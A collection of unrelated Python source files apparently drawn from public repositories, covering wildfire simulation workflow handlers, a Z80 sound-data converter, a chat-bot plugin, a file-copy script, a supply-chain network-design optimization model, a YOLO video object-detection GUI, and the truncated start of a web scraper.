post-processing simulation \" + err.message)\n return\n\n\ndef _registerWFAResultFile(filename, result_files, machine_name, directory, incidentId, simulationId):\n if filename not in result_files:\n return\n # For now comment this out, we need logic to correctly drive this based on the hotspot data\n # raise WildfireDataAccessException(\"Expected result file is not available from the simulation, this indicates the execution failed\")\n try:\n data_uuid = registerDataWithDM(filename, machine_name, \"WFA simulation\", \"application/octet-stream\",\n result_files[filename],\n \"GTIF\", path=directory, associate_with_incident=True, incidentId=incidentId,\n kind=\"WFA output file\",\n comment=\"Created by WFA on \" + machine_name + \" with simulation ID \" + simulationId)\n return data_uuid\n except DataManagerException as err:\n print(\"Error registering WFA result data with data manager, aborting \" + err.message)\n raise WildfireDataAccessException(\"Error registering WFA result data with data manager on the VESTEC system\")\n\ndef _registerMatchingFiles(directoryListing, matching_ending, machine_name, source, meta_file_description, description, directory, IncidentID, kind_description, commentStr):\n for entry in directoryListing:\n tokens=entry.split()\n if len(tokens) == 9 and matching_ending in tokens[-1]:\n if tokens[4].isnumeric():\n file_size=int(tokens[4])\n else:\n file_size=0\n try:\n registerDataWithDM(tokens[-1], machine_name, source, meta_file_description, file_size, description, \n path=directory, associate_with_incident=True, incidentId=IncidentID, kind=kind_description, \n comment=commentStr)\n except DataManagerException as err:\n print(\"Error registering \"+description+\" with data manager, aborting \"+err.message)\n return \n\n@pny.db_session\ndef _buildWFAPostYaml(simulation_directory, machine_basedir, simDuration):\n if simulation_directory[-1] != \"/\": simulation_directory += \"/\"\n\n sample_configuration_file = open(\"workflows/wildfire/templates/wfapost.yml\")\n yaml_template = yaml.load(sample_configuration_file, Loader=yaml.FullLoader)\n yaml_template[\"normal_gtif\"][\"path\"] = machine_basedir + simulation_directory + \"test_Fire_Best.tif\"\n yaml_template[\"fireshed_gtif\"][\"path\"] = machine_basedir + simulation_directory + \"test_FireShed_Best.tif\"\n yaml_template[\"variance\"][\"path\"] = machine_basedir + simulation_directory + \"test_Fire_Variance.tif\"\n yaml_template[\"mean\"][\"path\"] = machine_basedir + simulation_directory + \"test_Fire_Mean.tif\"\n\n yaml_template[\"sim_duration\"] = simDuration\n\n return yaml.dump(yaml_template)\n\n\n@workflow.handler\ndef wildfire_post_results(msg):\n print(\"Post processing of WFA results completed\")\n\n IncidentID = msg[\"IncidentID\"]\n simulationId = msg[\"simulationId\"]\n directoryListing = msg[\"directoryListing\"]\n\n with pny.db_session:\n simulation = Simulation[simulationId]\n machine_name = simulation.machine.machine_name\n\n for entry in directoryListing:\n tokens = entry.split()\n if len(tokens) == 9 and \".png\" in tokens[8]:\n try:\n registerDataWithDM(tokens[8], machine_name, \"WFA post-processing\", \"image/png\", int(tokens[4]),\n \"WFA output PNG\",\n path=simulation.directory, associate_with_incident=True, incidentId=IncidentID,\n kind=\"WFA image file\",\n comment=\"Created by WFA post-processor on \" + machine_name + \" with simulation ID \" + simulationId)\n except DataManagerException as err:\n print(\"Error registering WFA post-processed PNG '\" + tokens[\n 8] + \"' with data manager, 
aborting \" + err.message)\n\n if len(tokens) == 9 and \".kmz\" in tokens[8]:\n try:\n registerDataWithDM(tokens[8], machine_name, \"WFA post-processing\", \"image/octet-stream\", int(tokens[4]),\n \"WFA output KMZ\",\n path=simulation.directory, associate_with_incident=True, incidentId=IncidentID,\n kind=\"WFA KMZ file\",\n comment=\"Created by WFA post-processor on \" + machine_name + \" with simulation ID \" + simulationId)\n except DataManagerException as err:\n print(\"Error registering WFA post-processed KMZ '\" + tokens[\n 8] + \"' with data manager, aborting \" + err.message)\n\n\ndef RegisterHandlers():\n workflow.RegisterHandler(wildfire_fire_simulation, \"wildfire_fire_simulation\")\n workflow.RegisterHandler(wildfire_fire_static, \"wildfire_fire_static\")\n workflow.RegisterHandler(wildfire_fire_results, \"wildfire_fire_results\")\n workflow.RegisterHandler(wildfire_post_results, \"wildfire_post_results\")\n","repo_name":"VESTEC-EU/vestec-system","sub_path":"WorkflowManager/workflows/wildfire/wildfire.py","file_name":"wildfire.py","file_ext":"py","file_size_in_byte":16062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25537639715","text":"inFile = \"C:\\\\Users\\\\dg\\\\Desktop\\\\Z80\\\\psgconv\\\\Illusion.psg_.PSG\"\r\n#inFile = \"C:\\\\Users\\\\dg\\\\Desktop\\\\Z80\\\\psgconv\\\\n1k-o, TmK - lost madness (2018) (DiHalt Lite 2018, 2).PSG\"\r\noutFile = \"C:\\\\Users\\\\dg\\\\Desktop\\\\Z80\\\\psgconv\\\\song.s\"\r\n\r\nbyteCounter = 0\r\nmaxBytes=4096*3\r\ncolCounter = 0\r\noutFileS = open(outFile, 'w')\r\n\r\n\r\noutFileS.writelines(\"song_demo2:\\n\")\r\n\r\nwith open(inFile, 'rb') as f:\r\n f.read(16) # skip first 16 bytes\r\n\r\n lineArray = []\r\n\r\n while 1:\r\n byte_s = f.read(1)\r\n if not byte_s:\r\n break\r\n byte = byte_s[0]\r\n\r\n lineArray.append(\"0x{:02x}\".format(byte))\r\n byteCounter+= 1\r\n colCounter+=1\r\n if colCounter == 16:\r\n colCounter = 0\r\n outFileS.writelines(\" db \" + ','.join(lineArray)+\"\\n\")\r\n\r\n lineArray = []\r\n if byteCounter==maxBytes:\r\n outFileS.writelines(\" db 0xF0\\n\")\r\n outFileS.writelines(\" ;EOF\")\r\n exit(0)\r\n\r\nwhile 1:\r\n continue\r\n","repo_name":"dennis9819/Z80-Homebrew-Computer","sub_path":"Utilities/psgconv/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70638155946","text":"import json\nfrom urllib.error import HTTPError\nfrom urllib.request import urlopen\n\nfrom errbot import BotPlugin, botcmd\n\nUSER = \"\"\"\n User: %(username)s\n Name: %(name)s\n Team: %(team)s\n location: %(location)s\nendorsements: %(endorsements)s\n\"\"\"\nBADGE = \"%(name)20s -- %(description)s -- %(badge)s\"\n\n\nclass Coderwall(BotPlugin):\n @botcmd\n def coderwall(self, mess, args):\n \"\"\"Shows the badges of a coderwall user\n Example: !coderwall gbin\n \"\"\"\n if not args:\n return \"Am I supposed to guess the username?...\"\n response = None\n username = args.strip()\n try:\n content = urlopen(f\"http://coderwall.com/{username}.json\")\n results = json.loads(content.read().decode())\n for badge in results[\"badges\"]:\n self.send(mess.frm, BADGE % badge)\n response = USER % results\n except HTTPError:\n response = \"User not found.\"\n return 
response\n","repo_name":"errbotio/err-coderwall","sub_path":"coderwall.py","file_name":"coderwall.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4655312194","text":"import os\nimport sys\nimport re\nimport subprocess\n\ndef copy(indir,keywords,outdir):\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n for(root,dir,files) in os.walk(indir):\n for file in files:\n path=os.path.join(root,file)\n if re.search(keywords,path):\n subprocess.call('cp %s %s'%(path,outdir),shell=True)\n\nif __name__ == '__main__':\n if len(sys.argv)!=4:\n print(\"usage:python3 %s inputdir keywords outdir\"%(sys.argv[0]))\n print(\"Email:fanyucai1@126.com\")\n else:\n indir=sys.argv[1]\n keywords=sys.argv[2]\n outdir=sys.argv[3]\n copy(indir, keywords, outdir)\n","repo_name":"fanyucai1/script","sub_path":"file_copy.py","file_name":"file_copy.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26848541115","text":"#dd-markdown # Network Design \n#dd-markdown \n#dd-markdown Network Design is a critical business problems in many industries. \n#dd-markdown For example, a retailer might want to decide where to open a new warehouse to optimize supply chain cost between plants or providers and custoemrs or chops.\n#dd-markdown Another example, is a water dsitribuiton company might want to plan improvement i the distribution network, creating new tanks or new pipes.\n#dd-markdown \n#dd-markdown From a Decision Optimization perspective, some of these problems are part of the Facility Location Problem (FLP) category.\n#dd-markdown A simple version of this problem is presented here, with multiple commodities (products) and a single period.\n#dd-markdown \n#dd-markdown Input data is the existing network (nodes and links), with some flow capacities.\n#dd-markdown \n#dd-markdown Data also incldues some plans or predictions of what we will be produced atplants or available from providers, and predictions of what is expected by shops or customers.\n#dd-markdown \n#dd-markdown The decisions are where to open a new node.\n#dd-markdown \n#dd-markdown The problem might include:\n#dd-markdown * structural constraints:\n#dd-markdown * what enters into a node is what gets out of a node.\n#dd-markdown * constraints on nodes:\n#dd-markdown * limited flow capacity\n#dd-markdown * costs on nodes:\n#dd-markdown * fixed cost (i.e. cost to open a new node)\n#dd-markdown * variables flow cost (i.e. cost to manage the items for this node)\n#dd-markdown * constraints on links:\n#dd-markdown * limited capacity\n#dd-markdown * costs on links:\n#dd-markdown * variable cost according to flos (i.e. 
transportation cost)\n#dd-cell\n# Import pandas package to manage data as dataframes\nimport pandas as pd\n#dd-markdown ### Prepare data\n#dd-markdown \n#dd-markdown The paramaters input table includes:\n#dd-markdown * the minimum and maximal number of new distribution centers to be considered\n#dd-markdown * some limits on the niumber f products and custoemrs to consider so that the optimization problem can be reduced and solved into the CPLEX Community Edition available on all environments.\n#dd-cell\ndf_parameters = inputs['PARAMETERS']\ndf_parameters = df_parameters.set_index(['name'])\nMAX_CUSTOMERS = df_parameters.value['MAX_CUSTOMERS']\n\nMAX_PRODUCTS = df_parameters.value['MAX_PRODUCTS']\nprint (df_parameters)\n#dd-markdown Structure the rest of the data\n#dd-cell\ndf_plants = inputs['PLANTS']\nplants = df_plants['id'].values.tolist()\ndf_plants = df_plants.set_index(['id'])\n\nprint ('\\nPlants:')\nprint (df_plants)\n\ndf_distributionCenters = inputs['DISTRIBUTION_CENTERS']\ndistributionCenters = df_distributionCenters['id'].values.tolist()\ndf_distributionCenters = df_distributionCenters.set_index(['id'])\n\nprint ('\\nDistribution Centers:')\nprint (df_distributionCenters)\n\ndf_products = inputs['PRODUCTS']\nif (MAX_PRODUCTS < len(df_products)):\n df_products = df_products.sample(MAX_PRODUCTS)\nproducts = df_products['id'].values.tolist()\n\nprint ('\\nProducts:')\nprint (df_products)\n\ndf_customers = inputs['CUSTOMERS']\nif (MAX_CUSTOMERS < len(df_customers)):\n df_customers = df_customers.sample(MAX_CUSTOMERS)\ncustomers = df_customers['id'].values.tolist()\ndf_customers = df_customers.set_index(['id'])\n\nprint ('\\nCustomers:')\nprint (df_customers)\n\ndf_demand = inputs['DEMAND']\ndf_demand = df_demand.set_index(['customerId', 'productId'])\n\ndf_productionData = inputs['PRODUCTION_DATA']\ndf_productionData = df_productionData.set_index(['plantId', 'productId'])\n\ndf_storageData = inputs['STORAGE_DATA']\ndf_storageData = df_storageData.set_index(['dcId', 'productId'])\n\ndf_inboundData = inputs['INBOUND_DATA']\ndf_inboundData = df_inboundData.set_index(['plantId', 'dcId'])\n\n\ndf_outboundData = inputs['OUTBOUND_DATA']\ndf_outboundData = df_outboundData.set_index(['dcId', 'customerId'])\n#dd-markdown ### Create the Decision Optimization model\n#dd-markdown \n#dd-markdown Let's now create the optimization model using the `docplex.mp` package\n#dd-cell\n# CREATE CPLEX MODEL\n\nfrom docplex.mp.model import Model\nmdl = Model(name='NetworkDesign');\n#dd-markdown ### Create the decision variables\n#dd-markdown \n#dd-markdown We now create the decision variables:\n#dd-markdown * binary variable for each distribution center candidate, indictaing whether or not it should be open\n#dd-markdown * continuous variable for each product on each plant to distribution center segment indicating how much of this product flows on this link\n#dd-markdown * continuous variable for each product on each distribution center to customer segment indicating how much of this product flows on this link\n#dd-markdown \n#dd-markdown We also create auxiliary decision variables to represent:\n#dd-markdown * the cost of shipping products from distribution centers to customers\n#dd-markdown * the cost of storing products in distribution centers\n#dd-cell\n# CREATE VARIABLES\n\nopenDC = mdl.binary_var_dict(distributionCenters, name='openDC')\nshipDCToCustomer = mdl.continuous_var_cube(distributionCenters, products, customers, lb=0, name='shipDCToCustomer')\nshipPlantToDC = mdl.continuous_var_cube(plants, 
products, distributionCenters, lb=0, name='shipPlantToDC')\n\nshipDCCost = mdl.continuous_var_dict(distributionCenters, lb=0, name='shipDCCost')\nstoreDCCost = mdl.continuous_var_dict(distributionCenters, lb=0, name='storeDCCost')\n\n\nmdl.print_information()\n#dd-markdown ### Create the KPIs\n#dd-markdown \n#dd-markdown We create a KPI (Key Performance Indictaor) for each of the costs:\n#dd-markdown * variable plant cost\n#dd-markdown * inbound transportation cost (from plant to distribution center)\n#dd-markdown * outbound transportation cost (from distribution center to customer)\n#dd-markdown * fixed distribution centers cost \n#dd-markdown * variable distribution center cost\n#dd-markdown \n#dd-markdown We also create a KPI to easily report the number of new opened distribution centers.\n#dd-cell\n# CREATE KPIS\n\nvariablePlantCost = mdl.sum( df_productionData.varPlantCost[pl, pr] * shipPlantToDC[pl, pr, dc]\n for pl in plants for pr in products for dc in distributionCenters)\nmdl.add_kpi(variablePlantCost, 'variablePlantCost')\n\ninboundTransportationCost = mdl.sum( df_inboundData.unitCost[pl, dc]*shipPlantToDC[pl, pr, dc]\n for pl in plants for pr in products for dc in distributionCenters)\nmdl.add_kpi(inboundTransportationCost, 'inboundTransportationCost')\n\noutboundTransportationCost = mdl.sum( shipDCCost[dc] for dc in distributionCenters)\nmdl.add_kpi(outboundTransportationCost, 'outboundTransportationCost')\n\nfixedDistributionCenterCost = mdl.sum( df_distributionCenters.fixedCost[d] * openDC[d] for d in distributionCenters);\nmdl.add_kpi(fixedDistributionCenterCost, 'fixedDistributionCenterCost');\n\nvariableDistributionCenterCost = mdl.sum ( storeDCCost[dc] for dc in distributionCenters)\nmdl.add_kpi(variableDistributionCenterCost, 'variableDistributionCenterCost');\n\nnbOpenDistributionCenters = mdl.sum( openDC[dc] for dc in distributionCenters)\nmdl.add_kpi(nbOpenDistributionCenters, 'nbOpenDistributionCenters')\n\nmdl.print_information()\n#dd-markdown ### Create the objective\n#dd-markdown \n#dd-markdown Here the objective is simply the sum of the 5 cost KPIs.\n#dd-cell\n\n# CREATE OBJECTIVE\n\nmdl.minimize( variablePlantCost + inboundTransportationCost +\n outboundTransportationCost + variableDistributionCenterCost +\n fixedDistributionCenterCost )\n\nmdl.print_information()\n#dd-markdown ### Create the constraints\n#dd-markdown \n#dd-markdown The constraints are:\n#dd-markdown * capacity constraints:\n#dd-markdown * one on the plants and products\n#dd-markdown * one on the plants and products and distribution centers\n#dd-markdown * demand satisfaction: what is shipped to customer is exactly the quantity they expect\n#dd-markdown * flow on distribution centers structural constraint: what goes in from plants goes out to customers.\n#dd-markdown * cost variables definition constraints \n#dd-cell\n# CREATE CONSTRAINTS\n\n# Two capacity constraints\nfor pl in plants:\n for pr in products:\n mdl.add_constraint( mdl.sum( shipPlantToDC[pl, pr, dc] for dc in distributionCenters) <= df_productionData.capacity[pl, pr] )\n for dc in distributionCenters:\n for pr in products:\n mdl.add_constraint(shipPlantToDC[pl, pr, dc] <= openDC[dc] * df_productionData.capacity[pl, pr])\n\n# Satisfy demand\nfor cu in customers:\n for pr in products:\n if (cu, pr) in df_demand.index:\n mdl.add_constraint( mdl.sum(shipDCToCustomer[dc, pr ,cu] for dc in distributionCenters) == df_demand.quantity[cu, pr]);\n\n# Structural constraint flow\nfor pr in products:\n for dc in distributionCenters:\n 
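# flow conservation at each DC: per product, inbound from all plants equals outbound to all customers\n        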
mdl.add_constraint( mdl.sum( shipPlantToDC[pl, pr, dc] for pl in plants) ==\n mdl.sum(shipDCToCustomer[dc, pr, cu] for cu in customers) );\n\n# cost variable definition\nfor dc in distributionCenters:\n mdl.add_constraint( shipDCCost[dc] ==\n mdl.sum(df_outboundData.costPerUnit[dc, cu] * mdl.sum(shipDCToCustomer[dc, pr, cu] for pr in products) for cu in customers) )\n mdl.add_constraint( storeDCCost[dc] ==\n mdl.sum(df_storageData.costPerUnit[dc, pr] * mdl.sum(shipDCToCustomer[dc, pr, cu] for cu in customers) for pr in products) )\n\n \n\nmdl.print_information()\n#dd-markdown ### Additional constraints\n#dd-markdown \n#dd-markdown We also add a constraint on the minimum and maximum number of new distribution centers.\n#dd-cell\nMIN_OPEN_DCS = df_parameters.value['MIN_OPEN_DCS']\nmdl.add_constraint( nbOpenDistributionCenters >= MIN_OPEN_DCS )\nMAX_OPEN_DCS = df_parameters.value['MAX_OPEN_DCS']\nmdl.add_constraint( nbOpenDistributionCenters <= MAX_OPEN_DCS )\n\nmdl.print_information()\n#dd-markdown ### Solve the optimization problem\n#dd-markdown \n#dd-markdown We can now solve the optimization problem.\n#dd-markdown \n#dd-markdown **Remember that if you don't limit the number of products and/or customers and the number of variables or constraints goes above 1000, you will need to use the dedicate DO environment**\n#dd-cell\n# Solve\nmdl.parameters.threads = 1\nmdl.solve(log_output=True)\n\nmdl.report();\n#dd-markdown ### Create solution\n#dd-markdown \n#dd-markdown Now the problem is solved, we can extarct solutions into pandas fdata frame for a better reporting\n#dd-cell\n# Create solution\n\ndf_openDC = pd.DataFrame(data= [ [dc, openDC[dc].solution_value] for dc in distributionCenters],\n columns = ['dcId', 'open'] )\nprint(df_openDC)\n\ndf_shipDCToCustomer = pd.DataFrame(data= [ [dc, pr, cu, shipDCToCustomer[dc, pr, cu].solution_value] for dc in distributionCenters for pr in products for cu in customers],\n columns = ['dcId', 'productId', 'customerId', 'ship'] )\nprint (df_shipDCToCustomer)\n\ndf_shipPlantToDC = pd.DataFrame(data= [ [pl, pr, dc, shipPlantToDC[pl, pr, dc].solution_value] for pl in plants for pr in products for dc in distributionCenters],\n columns = ['plantId', 'productId', 'dcId', 'ship'] )\nprint (df_shipPlantToDC)\n\n\ndf_dcCosts = pd.DataFrame(data= [ [dc, df_distributionCenters.city[dc], shipDCCost[dc].solution_value, storeDCCost[dc].solution_value] for dc in distributionCenters],\n columns = ['dcId', 'dcCity', 'shipCost', 'storeCost'] )\nprint(df_dcCosts)\n\noutputs = {}\noutputs['openDC'] = df_openDC\noutputs['shipDCToCustomer'] = df_shipDCToCustomer\noutputs['shipPlantToDC'] = df_shipPlantToDC\noutputs['dcCosts'] = df_dcCosts\n#dd-cell\n\n","repo_name":"IBMDecisionOptimization/do-ws-pa","sub_path":"workspaces/networkdesign/do/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11617,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"27932756444","text":"#Ejercicio 3 Semana 2 Lunes\nwhile True:\n tipo =input(\"Ingresar el tipo de pizza que quiere, V siendo vegetariana y N no vegetariana:\").upper()\n if tipo != \"V\" and tipo !=\"N\":\n print(\"Ingreso invalido, intente de nuevo\")\n else:\n break\n\nif tipo == \"V\":\n ingredientes = [\"Tofu\", \"Pimiento\"]\nelse:\n ingredientes = [\"Peperoni\", \"Jamon\", \"Salmon\"]\n\nprint(\"A continuacion tiene los ingredientes disponibles para añadir a su pizza:\", ingredientes)\nseleccion = int(input(f\"Seleccione uno de los ingredientes, siendo 0 
el primero y {len(ingredientes)-1}, el ultimo:\"))\n\nif tipo == \"V\":\n print(\"Usted selecciono la pizza vegetariana\")\n print(f\"Con la adicion de {ingredientes[seleccion]}\")\nelse:\n print(\"Usted selecciono la pizza no vegetariana\")\n print(f\"Con la adicion de {ingredientes[seleccion]}\")\n","repo_name":"JuanBerriz/Programacion_Algoritmo_Repo","sub_path":"Semana 2/Ejercicio3.py","file_name":"Ejercicio3.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24792267460","text":"import numpy as np\nimport imutils\nimport time\nimport cv2\nimport os\nfrom pathlib import Path\nimport PySimpleGUIQt as sg\nimport gallery\nimport media_player\nimport copy\nimport moviepy.editor as mp \nfrom spleeter.separator import Separator\nimport copy\n\ni_vid = 'Enter path to input video'\no_vid = 'Enter path to output video'\no_sound = 'Enter path to output'\nyoloModelPath = Path().parent.absolute()\nyoloModelPath = str(yoloModelPath) + \"/yoloModel/\"\nsg.ChangeLookAndFeel('LightGrey')\n\nlayout1 = [\n\t\t[sg.Text('Perform YOLO Object Detection', size=(50,1), font=('Any',18),text_color='#1c86ee' ,justification='left')],\n\t\t[sg.Text('Path to input video'), sg.In(i_vid,size=(40,1), key='input'), sg.FileBrowse(size=(75, 30))],\n\t\t[sg.Text('Path to output video'), sg.In(o_vid,size=(40,1), key='output'), sg.FileSaveAs(size=(75, 30))],\n\t\t[sg.Text('Confidence'), sg.Slider(range=(0,10),orientation='h', resolution=1, default_value=5, size=(15,15), key='confidence'), sg.T(' ', key='_CONF_OUT_')],\n\t\t[sg.Text('Threshold'), sg.Slider(range=(0,10), orientation='h', resolution=1, default_value=3, size=(15,15), key='threshold'), sg.T(' ', key='_THRESH_OUT_')],\n\t\t[sg.Text(' '*8), sg.Checkbox('Write output video to disk', key='_DISK_')],\n\t\t[sg.OK(size=(100, 30)), sg.Stretch()],\n\t]\n\nlayout2 = [[sg.Text('Extract Audio from different sources', size=(50,1), font=('Any',18),text_color='#1c86ee' ,justification='left')],\n [sg.Text('Path to input video'), sg.In(i_vid,size=(40,1), key='inputSound'), sg.FileBrowse(size=(75, 30))],\n\t\t [sg.Text('Path to output sound tracks'), sg.In(o_sound,size=(40,1), key='outputSound'), sg.FileSaveAs(size=(75, 30))],\n\t\t [sg.Button('Extract Sound', size=(100, 30))]]\n\nlayout = [[sg.Column(layout1, key='-COLYOLO-'), sg.Column(layout2, visible=False, key='-COLSound-')],\n\t\t [sg.Frame(layout=[[sg.Button('YOLO', size=(50, 30)),\n\t\t sg.Button('Sound', size=(60, 30)), \n\t\t sg.Button('YOLO Saved Frames', size=(200, 30)), \n\t\t sg.Button('Exit', size=(50, 30))],\n\t\t ], title='Options', title_color='red', relief=sg.RELIEF_SUNKEN)\n\t\t ]]\n\nwin = sg.Window('Psychic CCTV',\n\t\t\t\tdefault_element_size=(21,1),\n\t\t\t\ttext_justification='right',\n\t\t\t\tauto_size_text=False).Layout(layout)\n\nlayoutVis = 'YOLO'\nwhile True:\n\tevent, values = win.Read()\n\n\tif event in 'YOLO Sound':\n\t\twin[f'-COL{layoutVis}-'].update(visible=False)\n\t\tlayoutVis = event\n\t\twin[f'-COL{layoutVis}-'].update(visible=True)\n\n\tif event == 'YOLO Saved Frames':\n\t\twin.Close()\n\t\tgallery.displayImages()\n\n\tif event is None or event =='Exit':\n\t\texit()\n\n\tif event == 'Extract Sound':\n\t\tprint(\"Sed Life\")\n\t\t# Add the spleeter thing here\n\t\t# Yeah done \n\t\tclip = mp.VideoFileClip(values[\"inputSound\"])\n\t\toutputs = os.getcwd() + '/inference/' +'sounds/' \n\t\tprint(outputs)\n\t\tclip.audio.write_audiofile(r\"sound.mp3\") \n\t\tseparator = 
Separator('spleeter:5stems')\n\t\tsounds_file = os.getcwd() + '/sound.mp3'\n\t\tprint(sounds_file)\n\t\tseparator.separate_to_file(sounds_file, 'output')\n\t\tmedia_player.MediaPlayerGUI()\n\n\tif event == 'OK':\n\t\twrite_to_disk = values['_DISK_']\n\t\targs = values\n\n\t\twin.Close()\n\n\t\tgui_confidence = args[\"confidence\"]/10\n\t\tgui_threshold = args[\"threshold\"]/10\n\n\t\tlabelsPath = os.path.sep.join([yoloModelPath, \"model.names\"])\n\t\tLABELS = open(labelsPath).read().strip().split(\"\\n\")\n\n\t\tnp.random.seed(42)\n\t\tCOLORS = np.random.randint(0, 255, size=(len(LABELS), 3),\n\t\t\tdtype=\"uint8\")\n\n\t\tweightsPath = os.path.sep.join([yoloModelPath, \"yolov3.weights\"])\n\t\tconfigPath = os.path.sep.join([yoloModelPath, \"yolov3.cfg\"])\n\n\t\tprint(\"[INFO] loading YOLO from disk...\")\n\t\tnet = cv2.dnn.readNetFromDarknet(configPath, weightsPath)\n\t\tln = net.getLayerNames()\n\t\tln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n\t\tvs = cv2.VideoCapture(args[\"input\"])\n\t\twriter = None\n\t\t(W, H) = (None, None)\n\n\t\ttry:\n\t\t\tprop = cv2.cv.CV_CAP_PROP_FRAME_COUNT if imutils.is_cv2() \\\n\t\t\t\telse cv2.CAP_PROP_FRAME_COUNT\n\t\t\ttotal = int(vs.get(prop))\n\t\t\tprint(\"[INFO] {} total frames in video\".format(total))\n\n\t\texcept:\n\t\t\tprint(\"[INFO] could not determine # of frames in video\")\n\t\t\tprint(\"[INFO] no approx. completion time can be provided\")\n\t\t\ttotal = -1\n\n\t\twin_started = False\n\t\tFrame_number = 0\n\n\t\twhile True:\n\t\t\tgrabbed, frame = vs.read()\n\t\t\tformat_frame = [copy.deepcopy(frame),copy.deepcopy(frame)]\n\t\t\tif not grabbed:\n\t\t\t\tbreak\n\n\t\t\tif W is None or H is None:\n\t\t\t\t(H, W) = format_frame[0].shape[:2]\n\n\t\t\tblob = cv2.dnn.blobFromImage(format_frame[0], 1 / 255.0, (416, 416),\n\t\t\t\tswapRB=True, crop=False)\n\t\t\tnet.setInput(blob)\n\t\t\tstart = time.time()\n\t\t\tlayerOutputs = net.forward(ln)\n\t\t\tend = time.time()\n\n\t\t\tboxes = []\n\t\t\tconfidences = []\n\t\t\tclassIDs = []\n\n\t\t\tfor output in layerOutputs:\n\t\t\t\tfor detection in output:\n\t\t\t\t\tscores = detection[5:]\n\t\t\t\t\tclassID = np.argmax(scores)\n\t\t\t\t\tconfidence = scores[classID]\n\n\t\t\t\t\tif confidence > gui_confidence:\n\t\t\t\t\t\tbox = detection[0:4] * np.array([W, H, W, H])\n\t\t\t\t\t\t(centerX, centerY, width, height) = box.astype(\"int\")\n\n\t\t\t\t\t\tx = int(centerX - (width / 2))\n\t\t\t\t\t\ty = int(centerY - (height / 2))\n\n\t\t\t\t\t\tboxes.append([x, y, int(width), int(height)])\n\t\t\t\t\t\tconfidences.append(float(confidence))\n\t\t\t\t\t\tclassIDs.append(classID)\n\n\t\t\tidxs = cv2.dnn.NMSBoxes(boxes, confidences, gui_confidence, gui_threshold)\n\n\t\t\tif len(idxs) > 0:\n\t\t\t\tcount = 0\n\t\t\t\tfor i in idxs.flatten():\n\t\t\t\t\tformat_frame[1] = copy.deepcopy(frame)\n\t\t\t\t\t(x, y) = (boxes[i][0], boxes[i][1])\n\t\t\t\t\t(w, h) = (boxes[i][2], boxes[i][3])\n\n\t\t\t\t\tcolor = [int(c) for c in COLORS[classIDs[i]]]\n\t\t\t\t\tfor g in range(len(format_frame)):\n\t\t\t\t\t\tcv2.rectangle(format_frame[g], (x, y), (x + w, y + h), color, 2)\n\t\t\t\t\t\ttext = \"{}: {:.4f}\".format(LABELS[classIDs[i]],\n\t\t\t\t\t\t\tconfidences[i])\n\t\t\t\t\t\tcv2.putText(format_frame[g], text, (x, y - 5),\n\t\t\t\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)\n\t\t\t\t\t\toutputer = os.getcwd() + '/inference/Objects/' + LABELS[classIDs[i]] \\\n\t\t\t\t\t\t\t\t\t+ str(Frame_number) +'_' + str(count) + '.jpg'\n\t\t\t\t\t\tcv2.imwrite(outputer,format_frame[1])\n\t\t\t\t\tcount += 
1\n\t\t\tif write_to_disk:\n\t\t\t\tif writer is None:\n\t\t\t\t\tfourcc = cv2.VideoWriter_fourcc(*\"MJPG\")\n\t\t\t\t\twriter = cv2.VideoWriter(args[\"output\"], fourcc, 30,\n\t\t\t\t\t\t(format_frame[0].shape[1], format_frame[0].shape[0]), True)\n\n\t\t\t\t\tif total > 0:\n\t\t\t\t\t\telap = (end - start)\n\t\t\t\t\t\tprint(\"[INFO] single frame took {:.4f} seconds\".format(elap))\n\t\t\t\t\t\tprint(\"[INFO] estimated total time to finish: {:.4f}\".format(\n\t\t\t\t\t\t\telap * total))\n\n\t\t\t\twriter.write(format_frame[0])\n\t\t\timgbytes = cv2.imencode('.png', format_frame[0])[1].tobytes() \n\n\t\t\tif not win_started:\n\t\t\t\twin_started = True\n\t\t\t\tlayout = [\n\t\t\t\t\t[sg.Text('Labelled Video', size=(30,1))],\n\t\t\t\t\t[sg.Image(data=imgbytes, key='_IMAGE_')],\n\t\t\t\t\t[sg.Text('Confidence'),\n\t\t\t\t\tsg.Slider(range=(0, 10), orientation='h', resolution=1, default_value=5, size=(15, 15), key='confidence'),\n\t\t\t\t\tsg.Text('Threshold'),\n\t\t\t\t\tsg.Slider(range=(0, 10), orientation='h', resolution=1, default_value=3, size=(15, 15), key='threshold')],\n\t\t\t\t\t[sg.Exit(size=(50, 30))]\n\t\t\t\t]\n\t\t\t\twin = sg.Window('Object Detection Output',\n\t\t\t\t\t\t\t\tdefault_element_size=(14, 1),\n\t\t\t\t\t\t\t\ttext_justification='right',\n\t\t\t\t\t\t\t\tauto_size_text=False).Layout(layout).Finalize()\n\t\t\t\timage_elem = win.FindElement('_IMAGE_')\n\t\t\telse:\n\t\t\t\timage_elem.Update(data=imgbytes)\n\n\t\t\tevent, values = win.Read(timeout=0)\n\t\t\tif event is None or event == 'Exit':\n\t\t\t\tbreak\n\t\t\tgui_confidence = values['confidence']/10\n\t\t\tgui_threshold = values['threshold']/10\n\t\t\t\n\t\t\tprint(Frame_number)\n\t\t\tFrame_number += 1\n\n\nwin.Close()\n\nprint(\"[INFO] cleaning up...\")\nwriter.release() if writer is not None else None\nvs.release()\n","repo_name":"Fireboltz/Psychic-CCTV","sub_path":"psychicCCTV.py","file_name":"psychicCCTV.py","file_ext":"py","file_size_in_byte":7527,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"18383576485","text":"import re\nimport urllib.request\nimport requests\n\nimport pandas as pd\n\n\ndef get_content(url, n):\n response = requests.get(url)\n\n context = re.findall(r'chapterContent:\".*?\"', 